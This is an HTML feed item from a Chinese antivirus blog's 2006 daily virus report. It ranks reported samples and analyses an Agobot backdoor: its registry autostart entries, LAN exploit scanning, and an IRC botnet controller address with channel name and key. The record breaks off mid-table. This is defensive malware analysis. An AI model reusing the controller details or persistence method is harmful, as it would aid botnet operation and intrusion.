		<link>http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx#comments</comments>
		<pubDate>Fri, 24 Mar 2006 05:02:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx</guid>
		<description><![CDATA[3月20日上报次数较多的样本有： 
bmnss.exe -------- 217； 
mousepad4.exe -------- 151； 
newname4.exe -------- 150； 
keyboard4.exe -------- 108； 
请进入全文查看它们的分析报告。]]></description>
			<content:encoded><![CDATA[<p><P><SPAN> <br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 562px" width=562></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 41px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width=562><br />
<DIV><STRONG><FONT face=Arial>昨日病毒</FONT></STRONG></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 31px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 146px" width=146><br />
<COL style="WIDTH: 149px" width=149></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=146><br />
<DIV><FONT face=Arial><STRONG>统计时段</STRONG></FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=149><br />
<DIV><FONT face=宋体><br />
<DIV title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><SPAN id=L025D04E004BA05E6 style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-20</SPAN><SPAN style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></SPAN></DIV></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 555px" width=555></COLGROUP><br />
<TBODY><br />
<TR><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><br />
<DIV><STRONG><FONT face=Arial>病毒样本上报数排行</FONT></STRONG></DIV><br />
<DIV><STRONG><FONT face=Arial></FONT></STRONG> </DIV><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 165px" width=165></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 22px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=229><br />
<DIV align=center><FONT face=Arial>样本文件名</FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=165><br />
<DIV align=center><FONT face=Arial>上报次数</FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY><br />
<TBODY><br />
<TR id=L025D06A007170C89><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L025D0720097413AC title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">bmnss.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L025D07600BD11B0F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">217</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L025DC0401C5D0CC4><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L025DC0C01EBACD87 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad4.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L025DC10021188E8A title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">151</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L030060402418EECD><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L030060C027194F90 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname4.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L030061002A19B093 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">150</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L0300A0402D1A50D6><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L0300A0C0301AF199 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard4.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0300A100331B929C title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">108</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 118px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><br />
<DIV><FONT face=Arial><STRONG>技术分析</STRONG></FONT></DIV><SPAN><SPAN id=L025D08200E2E2332 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L025D08A0108B2BD5><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L025D08E012E834B8 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">bmnss.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L025D092015453DDB title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L025D09A017A2477E title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\bmnss.exe, 257024字节<BR>在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Critical Runtime Indexer&#8221; = bmnss.exe<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;Critical Runtime Indexer&#8221; = bmnss.exe<BR>[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Critical Runtime Indexer&#8221; = bmnss.exe<BR>[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;Critical Runtime Indexer&#8221; = bmnss.exe<BR>这样，在Windows启动时，病毒就可以自动执行。</DIV><br />
<DIV> </DIV><br />
<DIV>2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。<BR> <BR>3、连接irc服务器64.33.201.123:6522，接收黑客命令。<BR>botnet:<BR>64.33.201.123:6522 nubbie<BR>#oldone# oldboot</DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L0300E040361C72DF title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L0300E0C0391D53A2><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L0300E1003C1E34A5 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad4.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0300E1403F1F15E8 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</SPAN></SPAN></TD></TR><br />
<TR id=L030120404B22A654><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L030120804E23C6D7 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname4.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L030120C05124E79A title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanClicker</SPAN></SPAN></TD></TR><br />
<TR id=L03016040542647DD><br />
